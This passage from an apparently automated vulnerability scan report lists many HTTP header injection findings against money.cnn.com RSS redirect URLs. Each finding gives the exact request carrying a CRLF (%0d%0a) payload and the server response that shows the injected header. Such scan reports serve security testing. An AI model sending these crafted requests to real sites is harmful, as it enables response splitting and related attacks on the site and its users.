Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/pf/c974d
dfb8820098c
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/pf/c974d
dfb88
...[SNIP]...

4.13. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 90cb7%0d%0a576c6e118c8 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/pf/airline_fees_rise/90cb7%0d%0a576c6e118c8 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/pf/airline_fees_rise/90cb7
576c6e118c8

Vary: Accept-Encoding
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/pf/airline_fees
...[SNIP]...

4.14. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8f75b%0d%0a0301f88c9c9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/8f75b%0d%0a0301f88c9c9/05/02/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:35 GMT
Server: Apache
Location: http://money.cnn.com/8f75b
0301f88c9c9
/05/02/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/8f75b
0301f88c9c9/05/02/p
...[SNIP]...

4.15. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a21ea%0d%0ace8f08eda0a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/a21ea%0d%0ace8f08eda0a/02/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:39 GMT
Server: Apache
Location: http://money.cnn.com/2011/a21ea
ce8f08eda0a
/02/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/a21ea
ce8f08eda0a/02
...[SNIP]...

4.16. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3c9cf%0d%0a319eab080e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/3c9cf%0d%0a319eab080e/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:40 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/3c9cf
319eab080e
/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/3c9cf
319eab080e/
...[SNIP]...

4.17. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 44f36%0d%0a03edaf98efe was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/44f36%0d%0a03edaf98efe/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/44f36
03edaf98efe
/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/44f36
03edaf98
...[SNIP]...

4.18. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 40f4e%0d%0a01397931e17 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/pf/40f4e%0d%0a01397931e17/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/pf/40f4e
01397931e17
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/pf/40f4e
01397
...[SNIP]...

4.19. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload a6e8c%0d%0a5795da73b5a was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/pf/atm_fees_chase/a6e8c%0d%0a5795da73b5a HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/pf/atm_fees_chase/a6e8c
5795da73b5a

Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/pf/atm_fees_cha
...[SNIP]...

4.20. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9d058%0d%0a1bf56faaac5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/9d058%0d%0a1bf56faaac5/05/02/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/9d058
1bf56faaac5
/05/02/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 344
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/9d058
1bf56faaac5/05/02/r
...[SNIP]...

4.21. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ec1d9%0d%0a9b4a48b1ec3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/ec1d9%0d%0a9b4a48b1ec3/02/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/ec1d9
9b4a48b1ec3
/02/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/ec1d9
9b4a48b1ec3/02
...[SNIP]...

4.22. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 30187%0d%0ad728de29929 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/30187%0d%0ad728de29929/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/30187
d728de29929
/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/30187
d728de29929
...[SNIP]...

4.23. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload af131%0d%0a1082710a90d was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/af131%0d%0a1082710a90d/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/af131
1082710a90d
/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/af131
1082710a
...[SNIP]...

4.24. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 7fe5b%0d%0af797b3b6d6e was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/real_estate/7fe5b%0d%0af797b3b6d6e/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/real_estate/7fe5b
f797b3b6d6e
/index.htm
Vary: Accept-Encoding
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/real_estate/7fe
...[SNIP]...

4.25. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 1e387%0d%0a1eb5ea7f25 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/1e387%0d%0a1eb5ea7f25 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/real_estate/home-sale-strategies.moneymag/1e387
1eb5ea7f25

Vary: Accept-Encoding
Content-Length: 338
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/real_estate/hom
...[SNIP]...

4.26. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload f99ed%0d%0a85c2e16168 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/f99ed%0d%0a85c2e16168/05/03/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/f99ed
85c2e16168
/05/03/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/f99ed
85c2e16168/05/03/pf
...[SNIP]...

4.27. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3deb8%0d%0a85daf08f43d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/3deb8%0d%0a85daf08f43d/03/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/3deb8
85daf08f43d
/03/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/3deb8
85daf08f43d/03
...[SNIP]...

4.28. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 4ed98%0d%0a4018d3b4574 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/4ed98%0d%0a4018d3b4574/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/4ed98
4018d3b4574
/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/4ed98
4018d3b4574
...[SNIP]...

4.29. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d15ab%0d%0a85e45e0a9d3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/d15ab%0d%0a85e45e0a9d3/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/d15ab
85e45e0a9d3
/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/d15ab
85e45e0a
...[SNIP]...

4.30. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload ffef4%0d%0aa029c46ab0e was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/ffef4%0d%0aa029c46ab0e/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/ffef4
a029c46ab0e
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/ffef4
a029c
...[SNIP]...

4.31. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload c3f49%0d%0aac654ae67d3 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/c3f49%0d%0aac654ae67d3 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/credit_card_fraud_identity_theft/c3f49
ac654ae67d3

Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/credit_card_
...[SNIP]...

4.32. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fcac7%0d%0a4dfd18c6daa was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/fcac7%0d%0a4dfd18c6daa/05/03/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/fcac7
4dfd18c6daa
/05/03/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/fcac7
4dfd18c6daa/05/03/p
...[SNIP]...

4.33. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 50f15%0d%0a1c251ebbaa7 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/50f15%0d%0a1c251ebbaa7/03/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/50f15
1c251ebbaa7
/03/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/50f15
1c251ebbaa7/03
...[SNIP]...

4.34. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 93a04%0d%0adbe11b730ea was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/93a04%0d%0adbe11b730ea/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/93a04
dbe11b730ea
/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/93a04
dbe11b730ea
...[SNIP]...

4.35. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 42731%0d%0a50eb27b4a8a was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/42731%0d%0a50eb27b4a8a/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/42731
50eb27b4a8a
/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/42731
50eb27b4
...[SNIP]...

4.36. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b3cce%0d%0a9574cc509ac was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

